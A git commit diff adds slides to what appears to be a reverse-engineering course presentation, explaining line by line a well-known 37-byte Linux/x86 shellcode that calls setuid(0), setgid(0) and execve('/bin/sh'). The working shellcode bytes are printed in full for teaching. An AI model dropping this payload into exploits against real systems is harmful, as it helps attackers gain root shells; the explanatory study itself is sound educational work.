short shellcode explainer added

2023-02-15 12:04:05 +01:00 · 2023-02-15 12:04:05 +01:00 · 14d3e81177
commit 14d3e81177
parent 4d2b960971
1 changed files with 93 additions and 0 deletions
--- a/index.html
+++ b/index.html
@ -503,6 +503,99 @@ Many improvements exist to make gdb nicer for reverse engineering, such as:
 - https://github.com/longld/peda
 ]
 ---
 template: inverse
 # Shellcode explained
 ---
 .left-column[
 ## Shellcode explained
 ]
 .right-column[
 Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html
 ```
 /*
 * (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 
 * - 37 bytes - xgc@gotfault.net
 */
  "\x6a\x17"              // push $0x17
  "\x58"                  // pop  %eax
  "\x31\xdb"              // xor  %ebx, %ebx
  "\xcd\x80"              // int  $0x80
  "\x6a\x2e"              // push $0x2e
  "\x58"                  // pop  %eax
  "\x53"                  // push %ebx
  "\xcd\x80"              // int  $0x80
  "\x31\xd2"              // xor  %edx, %edx
  "\x6a\x0b"              // push $0xb
  "\x58"                  // pop  %eax
  "\x52"                  // push %edx
  "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
  "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
  "\x89\xe3"              // mov  %esp, %ebx
  "\x52"                  // push %edx
  "\x53"                  // push %ebx
  "\x89\xe1"              // mov  %esp, %ecx
  "\xcd\x80"              // int  $0x80
 ```
 ]
 ---
 .left-column[
 ## Shellcode explained
 ]
 .right-column[
 ```
  "\x6a\x17"              // push $0x17
  "\x58"                  // pop  %eax
  "\x31\xdb"              // xor  %ebx, %ebx
  "\xcd\x80"              // int  $0x80
 ```
 `int 0x80` is a legacy way of doing a syscall to the kernel. See also:
 http://www.linfo.org/int_0x80.html As this is a 32-bit program, the list of syscalls can be found here: `/usr/include/asm/unistd_32.h` Which shows the values in decimal: 0x17 = 23 = setuid.
 So, whats done here is put 0x17 in EAX, and make EBX (the argument for setgid, see https://faculty.nps.edu/cseagle/assembly/sys_call.html) 0 using a XOR. Then call int 0x80. Resulting in a `setuid 0`.
 ]
 ---
 .left-column[
 ## Shellcode explained
 ]
 .right-column[
 ```
  "\x6a\x2e"              // push $0x2e
  "\x58"                  // pop  %eax
  "\x53"                  // push %ebx
  "\xcd\x80"              // int  $0x80
 ```
 Pretty much the same as last snippet, but for 0x2e = 46 = setgid.
 ]
 ---
 .left-column[
 ## Shellcode explained
 ]
 .right-column[
 ```
  "\x31\xd2"              // xor  %edx, %edx
  "\x6a\x0b"              // push $0xb
  "\x58"                  // pop  %eax
  "\x52"                  // push %edx
  "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
  "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
  "\x89\xe3"              // mov  %esp, %ebx
  "\x52"                  // push %edx
  "\x53"                  // push %ebx
  "\x89\xe1"              // mov  %esp, %ecx
  "\xcd\x80"              // int  $0x80
 ```
 Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to make things align on 32-bit words.
 The arguments for execve will not fit in registers, as they're variable size, so EBX gets a pointer to the string.
 ]
    </textarea>
    <script src="https://remarkjs.com/downloads/remark-latest.min.js">
    </script>